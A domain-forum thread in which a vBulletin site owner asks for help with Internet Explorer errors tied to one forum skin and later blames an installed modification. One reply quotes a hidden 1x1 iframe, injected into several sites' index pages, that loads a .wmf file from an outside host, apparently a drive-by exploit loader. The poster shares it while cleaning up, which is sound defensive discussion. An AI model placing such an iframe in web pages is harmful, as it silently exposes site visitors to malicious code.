• Welcome to DNForum.com - Domain Investor Forum, Free Domain Marketplace and a community for 45+ domain pros
    If you are new to domains and looking to buy, sell and learn about domains then you have come to the right place. DNForum is the oldest global domain name community on the internet and continues to grow every day. There are over 45,000 domainers on DNForum doing everything from buying domains, selling domains, using our free in-house built tools, learning about domains and discussing domains. Take a minute and Register.

.WMF? Please help

Status
Not open for further replies.

furca

DNF Addict
The Originals
Legacy Exclusive Member
Joined
Oct 22, 2004
Messages
3,506
Reaction score
5
Hello,

I own http://www.habbodiscussion.com and I need some help. One of my members is using INTERNET EXPLORER with the forum skin "Binxers Hat Blue"


http://habbodiscussion.com/?styleid=2

He is getting this error: http://habbodiscussion.com/showthread.php?t=5698
while on the forum home index page. This ONLY happens in IE and ONLY with styleID 2 (Binxers hat Blue).

Can someone please help me fix this? I also found this:

http://news.com.com/2061-10789_3-6027753.html

It doesn't appear to look like someone has accessed our website and I just can't find it in any of the files. 3 days ago we reverted all templates & uploaded all original vB files so everything should be fine.

If this is in the wrong section please move, didn't know where to post.


EDIT: Lots of weird things going on. Decided to close forum for security reasons while contacting jelsoft.
 
Can you post a screenshot of the error? Would be nice to know what it was and of course what you hear from Jelsoft.
 
Sites back. Appears to have been a modification that we installed. Deleted it, and going to contact the author shortly.

Also if you visit http://www.HabboDiscussion.com IN firefox on DEFAULT style do you guys see a little BOX on the left top that is half white and half black?...

What is this :l
 
i had a similar problem last week with some of my sites. some how all my index pages had this line added to them.

<iframe src="http://www.casa-matucci.ch/www.wmf" width=1
height=1></iframe>

although I am not great in web design i figure this line never belonged to my sites and removed it all but i am still trying to figure how it manged to get into atleast 5 of my sites.
 
Sites as in vBulletin Forums? I am positive there is some error with 3.5.3
 
Status
Not open for further replies.
Back
Top Bottom